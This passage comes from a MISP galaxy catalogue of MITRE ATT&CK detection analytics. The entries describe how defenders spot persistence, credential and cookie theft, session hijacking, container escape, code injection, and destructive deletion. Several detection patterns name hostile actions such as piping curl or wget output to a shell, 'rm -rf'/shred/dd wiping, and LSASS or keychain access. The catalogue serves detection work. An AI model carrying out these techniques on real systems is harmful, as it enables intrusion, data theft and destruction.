Associated metadata
Metadata key Value
external_id AN1230
mitre_platforms ['Linux']

Analytic 1302 - AN1302

Detects embedded macros or scripts added to shared documents or use of external references to execute code.

Internal MISP references

UUID bc143cf2-d6fb-4ea4-98a5-a2db81fc3f84 which can be used as unique global reference for Analytic 1302 - AN1302 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1302
mitre_platforms ['Office Suite']

Analytic 0123 - AN0123

Installation of a new browser extension followed by suspicious file writes or outbound network connections to untrusted domains by the browser process.

Internal MISP references

UUID db45c19b-d9d6-4794-8b49-ba232cca34b0 which can be used as unique global reference for Analytic 0123 - AN0123 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0123
mitre_platforms ['Windows']

Analytic 1032 - AN1032

Correlation of Registry key creation/modification events under known Run/Startup keys with new or unusual binary paths or script-based payloads. Multi-event detection includes registry modification followed by process execution from non-standard directories or abnormal parent-child process relationships.

Internal MISP references

UUID e863e865-8ecc-47ce-b736-eec54b6399d6 which can be used as unique global reference for Analytic 1032 - AN1032 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1032
mitre_platforms ['Windows']

Analytic 0321 - AN0321

Use of non-enterprise email or messaging services in Thunderbird, Evolution, or browsers leading to suspicious file downloads and subsequent execution. Defender view includes browser-initiated downloads of unexpected content and shell or interpreter processes launched post-download.

Internal MISP references

UUID eed7a6f2-496d-47c6-bdfd-1b885b58a651 which can be used as unique global reference for Analytic 0321 - AN0321 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0321
mitre_platforms ['Linux']

Analytic 0142 - AN0142

Correlate command executions involving 'sudo' with elevated effective user ID (euid=0), especially when tty_tickets is disabled or timestamp_timeout is actively abused.

Internal MISP references

UUID 0994985d-1d45-478e-9f1c-f407eb297007 which can be used as unique global reference for Analytic 0142 - AN0142 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0142
mitre_platforms ['Linux']

Analytic 1204 - AN1204

Detects suspicious inbound mail traffic where SPF/DKIM/DMARC authentication fails or where sender and return-path domains mismatch, observable in Apple Mail unified logs or MDM-controlled logging pipelines.

Internal MISP references

UUID 0c4a2cfd-a064-4f45-9c07-eb5c1044dd61 which can be used as unique global reference for Analytic 1204 - AN1204 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1204
mitre_platforms ['macOS']

Analytic 1420 - AN1420

Detects escalation via vulnerable setuid binaries or kernel modules, often chained with unusual access to /proc/kallsyms or /dev/kmem.

Internal MISP references

UUID 1327b96f-73db-4a5e-8e71-e515fc030bf3 which can be used as unique global reference for Analytic 1420 - AN1420 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1420
mitre_platforms ['Linux']

Analytic 0124 - AN0124

Installation of malicious .mobileconfig profiles or browser extension plist entries followed by abnormal browser child process activity.

Internal MISP references

UUID 41153f33-d415-4e1d-b3c8-7333b2f1915e which can be used as unique global reference for Analytic 0124 - AN0124 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0124
mitre_platforms ['macOS']

Analytic 1042 - AN1042

Execution of file or directory discovery commands (e.g., 'ls', 'find') from terminal or script-based tooling, especially outside normal user workflows.

Internal MISP references

UUID 42683860-d6df-4585-af65-31f783269f8f which can be used as unique global reference for Analytic 1042 - AN1042 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1042
mitre_platforms ['macOS']

Analytic 0214 - AN0214

AppleScript or system calls to activate WiFi/Bluetooth interfaces (networksetup, blueutil), followed by exfiltration via AirDrop, cloud sync, or network socket.

Internal MISP references

UUID 5a05483c-fb3b-4240-bf90-c1873b6bd392 which can be used as unique global reference for Analytic 0214 - AN0214 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0214
mitre_platforms ['macOS']

Analytic 1240 - AN1240

Account created via CLI using 'username' command or REST API. Detectable through AAA logging or CLI history telemetry.

Internal MISP references

UUID 614594ba-9590-4fa9-871c-3e092882c74c which can be used as unique global reference for Analytic 1240 - AN1240 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1240
mitre_platforms ['Network Devices']

Analytic 0412 - AN0412

Massive recursive deletions or overwrites via rm -rf, shred, dd, or wiper binaries. May include unlink syscalls, deletion of known config/data paths, or sequential overwrite patterns.

Internal MISP references

UUID 839d7053-fc62-433a-8eb2-ed87605160f7 which can be used as unique global reference for Analytic 0412 - AN0412 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0412
mitre_platforms ['Linux']

Analytic 0241 - AN0241

Defender observes use of CLI tools (find, grep, ls, dpkg, rpm, systemctl, ps aux) to discover backup agents or config files (e.g., rsnapshot, duplicity, veeam). This often includes command lines that recursively search /etc/, /opt/, or /var/ directories for keywords like backup, and parent-child relationships involving shell or Python scripts.

Internal MISP references

UUID 93918e31-51b1-4d85-8b16-590871c2cc1f which can be used as unique global reference for Analytic 0241 - AN0241 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0241
mitre_platforms ['Linux']

Analytic 0421 - AN0421

Forged SAML tokens can appear as SaaS logins where authentication succeeded without MFA, or where tokens contain claims inconsistent with the user profile. Look for concurrent sessions across different geographies with the same SAML assertion ID.

Internal MISP references

UUID 93c97a07-283e-46c5-b2ac-560db0382ea9 which can be used as unique global reference for Analytic 0421 - AN0421 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0421
mitre_platforms ['SaaS']

Analytic 1024 - AN1024

Encrypted traffic or ICMP tunneling from border routers to internal routers or unknown external IPs. Forwarded traffic shows consistent hop-to-hop relaying without matching configured VPN or expected network topology.

Internal MISP references

UUID a691ee45-94bf-4244-a286-b80c21859d2e which can be used as unique global reference for Analytic 1024 - AN1024 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1024
mitre_platforms ['Network Devices']

Analytic 2014 - AN2014

Once adversaries leverage the abused web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020) Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control Web Service or Exfiltration Over Web Service.

Internal MISP references

UUID da084995-0644-4152-a72d-44034845173a which can be used as unique global reference for Analytic 2014 - AN2014 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2014
mitre_platforms ['PRE']

Analytic 1402 - AN1402

Detects suspicious access to browser session cookie storage (e.g., Chrome’s Cookies SQLite DB) or memory reads of browser processes. Anomalous injection or memory dump utilities targeting browser processes such as chrome.exe, firefox.exe, or msedge.exe.

Internal MISP references

UUID dd105985-5d61-43f0-b69b-b4fd52632257 which can be used as unique global reference for Analytic 1402 - AN1402 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1402
mitre_platforms ['Windows']

Analytic 0521 - AN0521

Detects deletion or overwriting of bash history, syslog, audit logs, and .ssh metadata following privilege elevation or suspicious process spawning.

Internal MISP references

UUID 1fbe9da1-a760-4ac9-8ab0-59203a50fb82 which can be used as unique global reference for Analytic 0521 - AN0521 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0521
mitre_platforms ['Linux']

Analytic 1025 - AN1025

Detection of domain group enumeration through command-line utilities such as 'net group /domain' or PowerShell cmdlets, followed by suspicious access to API calls or LSASS memory.

Internal MISP references

UUID 2385f397-5d17-4b37-ba07-bb52a52ff66c which can be used as unique global reference for Analytic 1025 - AN1025 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1025
mitre_platforms ['Windows']

Analytic 0512 - AN0512

SQL stored procedures that invoke OS-level commands via xp_cmdshell equivalent or via UDF (User-Defined Functions) mechanisms.

Internal MISP references

UUID 2e039fd4-a1f6-4c4b-b47a-56c257335298 which can be used as unique global reference for Analytic 0512 - AN0512 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0512
mitre_platforms ['Linux']

Analytic 1052 - AN1052

Execution of PowerShell commands that modify mailbox permissions using Exchange cmdlets (e.g., Add-MailboxPermission), often tied to BEC or post-compromise persistence.

Internal MISP references

UUID 42d5a9d5-f897-4c45-b577-9b2c776c6c0d which can be used as unique global reference for Analytic 1052 - AN1052 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1052
mitre_platforms ['Windows']

Analytic 1520 - AN1520

Anomalous high-volume access to customer records in CRM software by a non-CRM admin user account, especially following initial authentication from a rare location or device. Behavior includes abnormal access to PII fields or data exports within a short time window.

Internal MISP references

UUID 616bc2d5-5c4d-4efa-9490-c77213be1de1 which can be used as unique global reference for Analytic 1520 - AN1520 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1520
mitre_platforms ['SaaS']

Analytic 0125 - AN0125

Manual or scripted installation of Chrome extensions using user scripts or config files, followed by unexpected network connections from browser processes.

Internal MISP references

UUID b5020e23-475e-4f74-a943-787e090d3e2f which can be used as unique global reference for Analytic 0125 - AN0125 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0125
mitre_platforms ['Linux']

Analytic 0152 - AN0152

Detection of adversary attempts to enumerate Group Policy settings through suspicious command execution (gpresult), PowerShell enumeration (Get-DomainGPO, Get-DomainGPOLocalGroup), and abnormal LDAP queries targeting groupPolicyContainer objects. Defenders observe unusual process lineage, script execution, or LDAP filter activity against domain controllers.

Internal MISP references

UUID bf5772b8-86b4-4d73-bbff-6abb5da9edac which can be used as unique global reference for Analytic 0152 - AN0152 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0152
mitre_platforms ['Windows']

Analytic 0251 - AN0251

Installation or execution of a malicious browser or IDE extension, followed by abnormal registry entries or outbound network connections from the host application.

Internal MISP references

UUID ce76c289-b810-44cf-b71e-afc76a70f7bf which can be used as unique global reference for Analytic 0251 - AN0251 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0251
mitre_platforms ['Windows']

Analytic 2015 - AN2015

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Phishing, Endpoint Denial of Service, or Network Denial of Service.

Internal MISP references

UUID d52fee09-db6e-4fe5-a859-7f3d273e85f0 which can be used as unique global reference for Analytic 2015 - AN2015 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2015
mitre_platforms ['PRE']

Analytic 1502 - AN1502

Monitor for suspicious use of cloud-native administrative command services (e.g., AWS Systems Manager Run Command, Azure RunCommand, GCP OS Config) to execute code inside VMs. Detect anomalies such as commands/scripts executed by unexpected users, execution outside of maintenance windows, or commands initiated by service accounts not normally tied to administration. Correlate cloud control-plane activity logs with host-level execution (process creation, script execution) to validate if commands materialized inside the guest OS.

Internal MISP references

UUID d8d5a1c0-9ba1-4735-af42-3d5b9d7a6603 which can be used as unique global reference for Analytic 1502 - AN1502 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1502
mitre_platforms ['IaaS']

Analytic 1250 - AN1250

Detects unauthorized modifications to PAM configuration files or shared object modules. Correlates file modification events under /etc/pam.d/ or /lib/security/ with unusual authentication activity such as multiple simultaneous logins, off-hours logins, or logons without corresponding physical/VPN access.

Internal MISP references

UUID d9c7e50d-4b13-4634-80f9-e8032a043414 which can be used as unique global reference for Analytic 1250 - AN1250 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1250
mitre_platforms ['Linux']

Analytic 1205 - AN1205

Correlates Office 365 or Google Workspace audit logs for spoofed sender addresses, failed email authentication, and anomalies in message delivery metadata. Defender observes failed SPF/DKIM checks and domain mismatches tied to suspicious campaigns.

Internal MISP references

UUID e7a0e155-e0bc-45b5-b0ef-98ec4f5eea63 which can be used as unique global reference for Analytic 1205 - AN1205 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1205
mitre_platforms ['Office Suite']

Analytic 0215 - AN0215

Detects adversarial use of cloud APIs for command execution, resource control, or reconnaissance. Focuses on CLI/SDK/scripting language abuse via stolen credentials or in-browser Cloud Shells. Monitors for anomalous API calls chained with authentication context shifts (e.g., stolen token -> privileged action) and cross-service impacts.

Internal MISP references

UUID fb933fd5-5dd8-4879-b2bb-e68bc26ff60d which can be used as unique global reference for Analytic 0215 - AN0215 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0215
mitre_platforms ['IaaS']

Analytic 1026 - AN1026

Behavioral detection of domain group enumeration via ldapsearch or custom scripts leveraging LDAP over the network.

Internal MISP references

UUID 3415a6fa-a447-42f3-8155-68cf5d7cbcb3 which can be used as unique global reference for Analytic 1026 - AN1026 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1026
mitre_platforms ['Linux']

Analytic 0216 - AN0216

Detection of anomalous RDP or remote service session activity where a logon session is hijacked rather than newly created. Indicators include mismatched user credentials vs. active session tokens, service session takeovers without corresponding successful logon events, or RDP shadowing activity without user consent.

Internal MISP references

UUID 3c320df0-2a99-4bc4-b0f4-7af1675ccdb9 which can be used as unique global reference for Analytic 0216 - AN0216 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0216
mitre_platforms ['Windows']

Analytic 1602 - AN1602

ESXi shell or scheduled tasks initiating outbound HTTPS to known public services without inbound return or loggable response, used to fetch instructions.

Internal MISP references

UUID 5ce50294-f89c-4158-b5f2-7ca257a88837 which can be used as unique global reference for Analytic 1602 - AN1602 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1602
mitre_platforms ['ESXi']

Analytic 1062 - AN1062

Abnormal loading of kernel modules, direct tampering with /dev, /proc, or LD_PRELOAD behaviors hiding processes or files.

Internal MISP references

UUID 62cf396f-01d6-4ab0-a3f5-bf75d90c2c40 which can be used as unique global reference for Analytic 1062 - AN1062 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1062
mitre_platforms ['Linux']

Analytic 0162 - AN0162

Correlate unauthorized or anomalous file modifications, deletions, or metadata changes with suspicious process execution or API calls. Detect abnormal changes to structured data (e.g., database files, logs, financial records) outside expected business process activity.

Internal MISP references

UUID 64d6b35c-4785-4e2b-bc93-1f54f626a7a7 which can be used as unique global reference for Analytic 0162 - AN0162 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0162
mitre_platforms ['Windows']

Analytic 0126 - AN0126

Inconsistencies between process command-line arguments logged at creation time and subsequent process behavior. Defender perspective: monitoring for processes launched in a suspended state, followed by memory modifications (e.g., WriteProcessMemory targeting the PEB) that overwrite arguments before execution resumes. Detection also includes observing anomalous behaviors from processes whose logged arguments do not align with executed activity (e.g., network connections, file writes, or registry modifications).

Internal MISP references

UUID 84ad99e5-4e6e-4d07-93ae-9e55e6f99707 which can be used as unique global reference for Analytic 0126 - AN0126 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0126
mitre_platforms ['Windows']

Analytic 1260 - AN1260

Adversary adds federated identity provider (IdP) or modifies tenant domain authentication from Managed to Federated. Detected via API, PowerShell, or Admin Portal through federation events like Set domain authentication, Add federated identity provider, or Update-MsolFederatedDomain.

Internal MISP references

UUID a2d3072a-0f3a-46a1-a92e-f0d7ae030b48 which can be used as unique global reference for Analytic 1260 - AN1260 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1260
mitre_platforms ['Identity Provider']

Analytic 2016 - AN2016

Much of this takes place outside the visibility of the target organization, making detection difficult for defenders.

Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID a62c45c3-3471-4366-9f7c-738fbd9473bd which can be used as unique global reference for Analytic 2016 - AN2016 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2016
mitre_platforms ['PRE']

Analytic 1620 - AN1620

Detection of suspicious use of tscon.exe or equivalent methods to hijack legitimate RDP sessions. Defenders can observe anomalies such as session reassignments without corresponding authentication, processes spawned in the context of hijacked sessions, or unusual RDP network traffic flows that deviate from expected baselines.

Internal MISP references

UUID be773ad4-9e5f-4063-910a-99a3cab90582 which can be used as unique global reference for Analytic 1620 - AN1620 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1620
mitre_platforms ['Windows']

Analytic 0261 - AN0261

Detects unusual use of cron or sleep loops inside containers executing unfamiliar scripts or binaries repeatedly.

Internal MISP references

UUID d20d7cf8-ecac-4011-96e0-3ec862223c11 which can be used as unique global reference for Analytic 0261 - AN0261 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0261
mitre_platforms ['Containers']

Analytic 1206 - AN1206

Suspicious use of NTFS file attributes such as Alternate Data Streams (ADS) or Extended Attributes (EA) to hide data. Defender perspective: anomalous file creations or modifications containing colon syntax (file.ext:ads), API calls like ZwSetEaFile/ZwQueryEaFile, or PowerShell/Windows utilities interacting with -stream parameters. Correlation across file metadata anomalies, process lineage, and command execution provides context.

Internal MISP references

UUID dba3fe8d-6080-4efe-9b93-6eda138ac771 which can be used as unique global reference for Analytic 1206 - AN1206 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1206
mitre_platforms ['Windows']

Analytic 0621 - AN0621

Processes invoking AVFoundation or CoreAudio frameworks, accessing input devices via TCC logs or Unified Logs, followed by writing AIFF/WAV/MP3 files to disk.

Internal MISP references

UUID f79a68ff-07f4-49ba-849b-9edb636f0b39 which can be used as unique global reference for Analytic 0621 - AN0621 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0621
mitre_platforms ['macOS']

Analytic 0612 - AN0612

Detection of container escape attempts via bind mounts, privileged containers, or abuse of docker.sock. Defenders may observe anomalous volume mount configurations (e.g., hostPath to / or /proc), unexpected privileged container launches, or use of container administration commands to access host resources. These events typically correlate with subsequent process execution on the host outside of normal container isolation.

Internal MISP references

UUID fc9161ef-3cab-45f5-a585-d78778d72f2b which can be used as unique global reference for Analytic 0612 - AN0612 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0612
mitre_platforms ['Containers']

Analytic 1207 - AN1207

Abuse of mavinject.exe to inject DLLs or import descriptors into another running process. Chain: (1) mavinject.exe starts with /INJECTRUNNING or /HMODULE → (2) mavinject obtains high-access handles to a target process (VM_WRITE/CREATE_THREAD) → (3) target process loads attacker DLL (module load) → (4) optional follow-on child activity or network egress from the target process.

Internal MISP references

UUID 0fff438f-1aa9-4424-be94-a08b400adcb0 which can be used as unique global reference for Analytic 1207 - AN1207 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1207
mitre_platforms ['Windows']

Analytic 1027 - AN1027

Enumeration of domain groups using dscacheutil or dscl commands, often following initial login or domain trust queries.

Internal MISP references

UUID 23fa40ac-79d0-400a-a017-8e06cfc67e6c which can be used as unique global reference for Analytic 1027 - AN1027 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1027
mitre_platforms ['macOS']

Analytic 0127 - AN0127

Execution of discovery commands or API calls for virtualization artifacts (e.g., registry keys, device drivers, services), sleep/skipped execution behavior, or sandbox evasion DLLs before payload deployment.

Internal MISP references

UUID 55808d73-7aa9-4f2c-8122-8e60bf14f4c6 which can be used as unique global reference for Analytic 0127 - AN0127 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0127
mitre_platforms ['Windows']

Analytic 2017 - AN2017

Once adversaries have provisioned compromised infrastructure (e.g., a server for use in command and control), internet scans may help proactively discover it. Consider looking for identifiable patterns such as listening services, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021) Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest, as benign registration and resolution changes are a common occurrence on the internet. Monitor queried and logged domain name system (DNS) data, DNS registry data, and contextual data about Internet-facing resources gathered from scans (such as running services or ports) for signs that third-party infrastructure has been compromised for use during targeting. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.

Internal MISP references

UUID 816aaddd-dc6d-49da-8ecd-8afde6278181 which can be used as unique global reference for Analytic 2017 - AN2017 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2017
mitre_platforms ['PRE']

Analytic 1072 - AN1072

Adversary use of bash/zsh or AppleScript to locate files and exfil targets like user keychains or documents.

Internal MISP references

UUID a48f36c7-e946-4270-ae23-1a2e52ae2e24 which can be used as unique global reference for Analytic 1072 - AN1072 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1072
mitre_platforms ['macOS']

Analytic 0721 - AN0721

Forged credentials on macOS may be visible through Unified Logs showing abnormal access to Keychain or browser session files. Correlated with anomalous web session usage from Safari or Chrome processes outside typical user context.

Internal MISP references

UUID b2569010-23c0-4dd8-9e53-3537c1e89efc which can be used as unique global reference for Analytic 0721 - AN0721 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0721
mitre_platforms ['macOS']

Analytic 0712 - AN0712

Detects extraction or mounting of container/archive files (e.g., .iso, .vhd, .zip) that originated from the Internet but whose contained files lack Zone.Identifier MOTW tagging. Correlates file creation metadata with subsequent execution of unsigned or untrusted binaries launched outside SmartScreen or Protected View.

Internal MISP references

UUID c7172412-6e48-45a0-a1c5-2eae892c1fc7 which can be used as unique global reference for Analytic 0712 - AN0712 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0712
mitre_platforms ['Windows']

Analytic 0271 - AN0271

Processes using Win32 API calls (e.g., EnumWindows, GetForegroundWindow) or scripting tools (e.g., PowerShell, VBScript) to enumerate open windows. These often appear with reconnaissance or data collection TTPs.

Internal MISP references

UUID c76d69b2-f1d4-4867-965b-886b6caf95be which can be used as unique global reference for Analytic 0271 - AN0271 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0271
mitre_platforms ['Windows']

Analytic 1270 - AN1270

Burst of failed login attempts across VM instances using leaked credential pairs from a single IP in public cloud environments.

Internal MISP references

UUID de41a23b-b07d-411b-80f7-d1a8f55ba459 which can be used as unique global reference for Analytic 1270 - AN1270 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1270
mitre_platforms ['IaaS']

Analytic 0172 - AN0172

Detects Python execution via python.exe or py.exe with anomalous parent lineage (e.g., Office macros, LOLBAS), execution from unusual directories, or chained network/PowerShell/system-level activity.

Internal MISP references

UUID f392a2cb-dd4b-4585-84d5-1fa4bd65ff60 which can be used as unique global reference for Analytic 0172 - AN0172 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0172
mitre_platforms ['Windows']

Analytic 0217 - AN0217

Detection of SSH/Telnet session hijacking via discrepancies between authentication logs and active session tables. Adversary behavior includes reusing or stealing active PTY sessions, attaching to screen/tmux, or issuing commands without corresponding login events.

Internal MISP references

UUID fba8a3f5-74d0-47d2-a688-1bdcc99dae6b which can be used as unique global reference for Analytic 0217 - AN0217 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0217
mitre_platforms ['Linux']

Analytic 1720 - AN1720

Application vetting services could detect usage of standard clipboard APIs.

Internal MISP references

UUID 2f0ca83e-1318-4722-88b2-1bffedb5d127 which can be used as unique global reference for Analytic 1720 - AN1720 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1720
mitre_platforms ['iOS']

Analytic 1702 - AN1702

Enterprises may be able to detect anomalous traffic originating from mobile devices, which could indicate compromise.

Internal MISP references

UUID cb78ff0f-6f8a-41a8-a199-4660a0addec9 which can be used as unique global reference for Analytic 1702 - AN1702 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1702
mitre_platforms ['Android']

Analytic 0128 - AN0128

Execution of commands to enumerate virtualization-related files or processes (e.g., '/sys/class/dmi/id/product_name', dmesg, lscpu, lspci), or querying hypervisor interfaces prior to malware execution.

Internal MISP references

UUID 412b76ec-d44e-4064-9dc1-32cf793f0176 which can be used as unique global reference for Analytic 0128 - AN0128 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0128
mitre_platforms ['Linux']

Analytic 1208 - AN1208

Detects creation or modification of user-level Launch Agents in monitored directories using .plist files with suspicious ProgramArguments or RunAtLoad keys. Correlates file write activity with execution of launchctl or unsigned binaries invoked at login.

Internal MISP references

UUID 441bfb28-3fe5-410b-93a5-2280a7f19dad which can be used as unique global reference for Analytic 1208 - AN1208 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1208
mitre_platforms ['macOS']

Analytic 0281 - AN0281

Detects embedded Lua interpreter execution or script injection on devices supporting Lua scripting (e.g., routers, firewalls), often seen in modified firmware or abused APIs.

Internal MISP references

UUID 755fb4b5-903f-4694-b591-04078afa27aa which can be used as unique global reference for Analytic 0281 - AN0281 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0281
mitre_platforms ['Network Devices']

Analytic 0812 - AN0812

Detection of file execution where the file name contains a trailing space to masquerade as a known executable. Adversaries may exploit the way command line interpreters handle file names with trailing whitespace.

Internal MISP references

UUID 778e2c18-2b26-4dd4-b4b2-3f8310d57a07 which can be used as unique global reference for Analytic 0812 - AN0812 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0812
mitre_platforms ['Linux']

Analytic 2018 - AN2018

Monitor call logs from corporate devices to identify patterns of potential voice phishing, such as calls to/from known malicious phone numbers.

Internal MISP references

UUID 80e453fd-8191-474a-b577-7a575ef5fe87 which can be used as unique global reference for Analytic 2018 - AN2018 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2018
mitre_platforms ['PRE']

Analytic 0182 - AN0182

PowerShell or script execution with parameters that suppress errors or ignore user interrupts, such as -ErrorAction SilentlyContinue. Defender perspective: detecting discrepancies between suppressed error arguments and continued execution behavior.

Internal MISP references

UUID 80e9341d-7ea4-4684-8f27-54566e996ce6 which can be used as unique global reference for Analytic 0182 - AN0182 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0182
mitre_platforms ['Windows']

Analytic 0218 - AN0218

Detection of hijacked VNC or SSH sessions on macOS where adversaries take over an existing session rather than authenticating directly. Indicators include process execution from active sessions without new logon events, manipulation of TTY sessions, or anomalous network activity tied to dormant sessions.

Internal MISP references

UUID 81889314-3404-4cfb-a650-52a5898b6f31 which can be used as unique global reference for Analytic 0218 - AN0218 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0218
mitre_platforms ['macOS']

Analytic 1280 - AN1280

Enumeration of saved Wi-Fi profiles and cleartext password retrieval using netsh wlan or API-level access to wlanAPI.dll.

Internal MISP references

UUID 8d58973f-7fd7-435e-86b8-58f9b399f89f which can be used as unique global reference for Analytic 1280 - AN1280 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1280
mitre_platforms ['Windows']

Analytic 1028 - AN1028

Abuse of Regsvcs.exe or Regasm.exe to execute arbitrary code embedded in .NET assemblies via [ComRegisterFunction]/[ComUnregisterFunction]. Behavioral chain: (1) Process creation of regsvcs/regasm with suspicious assembly paths/flags → (2) Assembly/DLL load inside regsvcs/regasm → (3) Registry writes to HKCR\CLSID/ProgID during COM registration → (4) Optional child process or network activity spawned by installer/registration code.

Internal MISP references

UUID a5e9fb06-ab75-415d-beff-206aa059e096 which can be used as unique global reference for Analytic 1028 - AN1028 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1028
mitre_platforms ['Windows']

Analytic 0821 - AN0821

User or desktop application writes a new file to ~/Downloads, /tmp, or mounted removable media followed by execve of a risky interpreter/loader (bash, sh, python, perl, php, node, curl|wget piping to sh, ld.so, rdesktop, xdg-open - with unusual args). Uses auditd PATH+SYSCALL (open/creat/write/rename) with execve event linking.

Internal MISP references

UUID e0b64d4e-79e0-47b8-a95c-414e2b69406d which can be used as unique global reference for Analytic 0821 - AN0821 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0821
mitre_platforms ['Linux']

Analytic 1082 - AN1082

Identifies use of sh/bash/zsh in suspicious context, such as user scripts launched from non-standard apps (e.g., Preview.app), embedded in LaunchDaemons, or executed outside Terminal.app. Looks for misuse in Automator, LaunchAgents, or NSAppleScript-executed shell.

Internal MISP references

UUID ebd61e14-852c-403b-8b50-7e15a1c32d05 which can be used as unique global reference for Analytic 1082 - AN1082 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1082
mitre_platforms ['macOS']

Analytic 1820 - AN1820

Google sends a notification to the device when Android Device Manager is used to locate it. Additionally, Google provides the ability for users to view their general account activity and alerts users when their credentials have been used on a new device. Apple iCloud also provides notifications to users of account activity such as when credentials have been used.

Internal MISP references

